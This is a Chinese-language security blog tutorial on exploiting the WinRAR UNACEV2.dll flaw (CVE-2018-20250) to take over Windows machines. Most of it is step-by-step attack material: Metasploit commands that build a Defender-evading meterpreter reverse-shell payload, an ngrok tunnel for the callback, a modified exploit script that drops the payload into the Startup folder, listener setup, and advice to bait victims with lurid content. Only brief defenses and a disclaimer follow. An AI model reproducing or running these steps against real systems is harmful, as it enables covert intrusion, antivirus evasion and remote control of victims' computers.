WinRAR遠端程式碼執行漏洞結合Metasploit+Ngrok實現遠端上線

Metasploit · 發表 2019-03-11 08:45:15

摘要： *本文作者：艾登——皮爾斯，本文屬 FreeBuf 原創獎勵計劃，未經許可禁止轉載。前言 Windows 作業系統下知名老牌的的壓縮軟體“WinRAR” 被國外安全研究團隊爆出嚴重威脅使用者的安全漏洞，被發現漏洞是“WinRAR”安裝目錄中的一個名為“UNACEV2.dll”的動態連...

*本文作者：艾登——皮爾斯，本文屬 FreeBuf 原創獎勵計劃，未經許可禁止轉載。

前言

Windows 作業系統下知名老牌的的壓縮軟體“WinRAR” 被國外安全研究團隊爆出嚴重威脅使用者的安全漏洞，被發現漏洞是“WinRAR”安裝目錄中的一個名為“UNACEV2.dll”的動態連結庫檔案，該檔案自 2005 年釋出至今就從未有過更新過，影響時長長達十餘年之久。本篇文章鄙人會使用圖文+視訊的教程來給各位不知道利用的小粉們講一下，視訊教程在文末尾處。

漏洞細節: https://research.checkpoint.com/extracting-code-execution-from-winrar/

影響版本

WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好壓(2345壓縮) < = 5.9.8.10907
360壓縮< = 4.0.0.1170

準備

KaliLinux(版本隨意我這裡使用的版本是2019.1版本)
ngrok
Metasploit(KaliLinux2019.1已經集成了Metasploit5)

圖文教程開始

1.1 下載WinRAR遠端程式碼執行漏洞EXP利用檔案:

https://github.com/WyAtu/CVE-2018-20250.git

1.2 開啟你的瀏覽器開啟 https://www.ngrok.cc/ 有賬號登入，沒有賬戶註冊登入。開通一個免費的隧道轉發代理，把ngrok隧道協議設定成TCP，內網IP改成你自己的KaliLinux的內網IP，內網埠號任意填寫不衝突即可。

1.3 記住如圖所示紅線框起來的兩部分內容，後面會用到。

1.4 然後下載ngrok指令碼到你的KaliLinux上面，選擇”Linux 64Bit版本”儲存到桌面上，執行指令碼開啟代理。

./sunny clientid [隧道ID]

Metasploit生成免殺Payload 載荷(針對Windows10的defender)

2.1 使用Metasploit5自帶的免殺模組生成Payload

msfconsole
use evasion/windows/windows_defender_exe(選擇msf5免殺模組)
show info(顯示模組資訊)
set filename WinRarPayloadTest.exe(設定Payload名字 )
set payload windows/meterpreter/reverse_tcp(設定Payload型別 )
set lhost free.idcfengye.com(設定上線地址，填寫Ngrok映射出去的地址即可)
set lport 12352(設定監聽埠，填寫Ngrok映射出去的埠即可 )
run(生成Payload)

(Payload的路徑地址:/root/.msf4/local/WinRarPayload.exe)

2.2 把Payload移動到apache2網站根目錄下

cp /root/.msf4/local/xxxxx.exe /var/www/htm

2.3 啟動阿帕奇服務

service apache2 start

2.4 物理機訪問KaliLinux的IP地址，下載這個Payload檔案到EXP資料夾下的根目錄。

2.5 開啟exp.py檔案把“calc.exe“修改成”WinRarPayload.exe”儲存。

2.6 Python執行exp.py檔案自動在檔案根目錄下生成惡意壓縮包。

2.7 已經成功生成了惡意的壓縮包，這時候你們往裡面丟一些照片視訊(你懂的)什麼的就變成了誘人的壓縮包了。

Windows7靶機下載解壓這個惡意壓縮包：

3.1 解壓後自動在系統啟動目錄下自動出現我們之前生成的Payload。

Windows7系統啟動目錄:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。

Metasploit啟動遠端監聽主機上線請求:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 8989
run

確保ngrok後臺在執行,然後重啟Windows7靶機，metasploit監聽等待上線。

視訊復現教程

https://www.lanzous.com/i3a0ide 密碼:FreeBuf

防禦方法

1. 解除安裝Winrar，下載7z，安裝包體積小，壓縮解壓速度快( 傳送門 )

2. 刪除UNACEV2.dll檔案

3. 不下載解壓來歷不明的壓縮包(色字頭上一把刀，手衝一時爽)

小結

evasion/windows/windows_defender_exe這個免殺模組基本可以免殺大多防毒軟體(Windows10 Defender,火絨等等)，也可以通過Shllecode編碼的方式來達到免殺的效果，條條大路通羅馬。其次你也可以使用Windows平臺下的其他遠端RAT(Njrat，Ghost等等)來生成惡意的壓縮包，Windows平臺的內網穿透工具可以使用”網路通”，來達到效果。文章和視訊僅用於安全教育的範疇；切勿違法使用，視訊配BGM是鄙人喜好，望各位前輩多多包涵。